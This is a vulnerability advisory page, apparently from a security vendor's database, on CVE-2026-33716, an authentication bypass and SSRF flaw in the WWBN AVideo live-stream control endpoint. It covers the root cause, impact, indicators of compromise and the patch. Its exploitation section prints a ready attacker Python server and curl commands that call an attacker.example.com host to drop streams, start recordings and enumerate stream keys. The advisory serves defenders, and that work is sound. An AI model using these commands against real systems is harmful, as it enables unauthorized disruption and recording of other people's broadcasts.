CVE-2026-33716: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33716 is an authentication bypass vulnerability in WWBN AVideo, an open source video platform, affecting versions up to and including 26.0. The flaw resides in the standalone live stream control endpoint plugin/Live/standAloneFiles/control.json.php, which accepts a user-supplied streamerURL parameter that overrides the server's token verification destination, allowing unauthenticated attackers to redirect verification to an attacker-controlled server. Disclosed on March 23, 2026, it carries a CVSS v3.1 base score of 9.4 (Critical) (Github Advisory, GitHub Security Advisory).

Technical details

The root cause is improper authentication (CWE-287): the control.json.php endpoint reads the streamerURL parameter directly from $_REQUEST without any validation and uses it to construct the token verification URL via file_get_contents(). The legitimate verifyToken.json.php performs cryptographic validation via Live::decryptHash() with a 12-hour expiry window, but by pointing verification at an attacker-controlled server that always returns {"error": false}, all authentication is bypassed. SSL certificate verification is also explicitly disabled in the request context, meaning the SSRF request follows any attacker-supplied URL unconditionally. Notably, the developers had already applied an equivalent fix to the sibling file saveDVR.json.php on 2026-03-19 with an explicit SSRF warning comment, but the same fix was not applied to control.json.php (Github Advisory, GitHub Security Advisory).

Impact

Successful exploitation allows any unauthenticated remote attacker to issue control commands to the NGINX RTMP module, including drop_publisher (terminating active live broadcasts), record_start/record_stop (starting or stopping recordings of any stream without authorization), and is_recording (enumerating valid stream keys). The SSRF component additionally enables the server to make outbound HTTP requests to attacker-controlled infrastructure, potentially exposing internal services or facilitating data exfiltration. Confidentiality impact is low (stream enumeration and SSRF), while integrity and availability impacts are high due to unauthorized recording and stream disruption (Github Advisory).

Exploitability

A detailed proof-of-concept exploit is publicly available in the GitHub Security Advisory, including specific curl commands and a minimal Python server that can be used to execute the attack against any vulnerable AVideo deployment with no credentials required (GitHub Security Advisory). The EPSS score is approximately 0.106% (28th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing. No threat actor attribution has been reported at this time (Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing WWBN AVideo instances running version 26.0 or earlier using search engines (Shodan, Censys) or by probing the /plugin/Live/standAloneFiles/control.json.php endpoint for a response.
  2. Set up attacker server: Deploy a minimal HTTP server on an attacker-controlled host (e.g., attacker.example.com:8888) that responds to all GET requests with {"error": false}:
python3 -c '
import http.server, json
class H(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type","application/json")
        self.end_headers()
        self.wfile.write(json.dumps({"error": False}).encode())
    def log_message(self, *a): pass
http.server.HTTPServer(("0.0.0.0", 8888), H).serve_forever()
'
  1. Bypass authentication and drop a live stream: Send a crafted request with streamerURL pointing to the attacker server and any arbitrary token value:
curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=drop_publisher&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"
  1. Start unauthorized recording: Replace drop_publisher with record_start to begin recording any active stream:
curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=record_start&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"
  1. Enumerate stream keys: Use is_recording to probe for valid stream names by iterating over guessed stream keys:
curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=is_recording&name=GUESS_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

(GitHub Security Advisory)

Indicators of compromise

  • Network: Outbound HTTP/HTTPS requests from the AVideo server to unexpected external hosts (especially on non-standard ports) originating from the PHP process; inbound GET requests to /plugin/Live/standAloneFiles/control.json.php with a streamerURL parameter pointing to external or non-local hosts.
  • Logs: Web server access logs showing requests to control.json.php with streamerURL query parameters containing external IP addresses or domains; PHP error logs (error_log) entries from control.json.php with unusual streamerURL values; NGINX RTMP control log entries for drop/publisher, record/start, or record/stop commands not initiated by legitimate users.
  • Application Behavior: Unexpected termination of active live streams (drop_publisher commands); unauthorized recording files appearing in the recording directory; repeated probing of stream keys via is_recording with varying name parameters. (GitHub Security Advisory)

Mitigation and workarounds

Apply the patch in commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128, which removes the user-supplied streamerURL override in control.json.php and sanitizes the name parameter to prevent path traversal (GitHub Patch). If an immediate upgrade is not possible, restrict network access to the plugin/Live/standAloneFiles/control.json.php endpoint to trusted IP ranges only via web server or firewall rules, and implement egress filtering to block outbound requests from the PHP process to arbitrary external hosts. Monitor web server logs for requests to this endpoint containing a streamerURL parameter as a detection measure (Github Advisory).

Community reactions

The vulnerability received coverage from The Hacker Wire and Yazoul security advisory sites shortly after disclosure (The Hacker Wire, Yazoul Advisory). Security Online Info also covered the vulnerability as part of a broader report on critical AVideo vulnerabilities (Security Online). Community discussion was noted on Mastodon and Bluesky, and the advisory was indexed by GitLab's advisory database (GitLab Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management